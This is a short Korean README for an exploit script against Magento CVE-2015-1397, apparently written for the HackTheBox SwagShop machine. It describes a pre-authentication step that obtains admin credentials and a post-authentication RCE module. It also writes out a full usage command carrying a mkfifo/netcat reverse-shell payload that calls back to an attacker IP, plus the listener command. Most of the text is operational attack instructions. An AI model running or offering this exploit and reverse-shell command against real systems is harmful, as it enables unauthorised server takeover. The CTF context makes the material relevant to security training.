
Magento CMS의 CVE-2015-1397용 익스플로잇 스크립트로, 관리자 자격 증명을 얻기 위한 사전 인증 익스플로잇과 역방향 셸 실행을 위한 사후 인증 RCE 모듈을 포함합니다.
HackTheBox - SwagShop에서 확인된 취약점
Magento CMS 대시보드에 대한 관리자 자격 증명 획득
exploit.py에서 획득한 자격 증명을 post_auth.py에 추가한 후 실행:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
리스너:
nc -lvnp 4444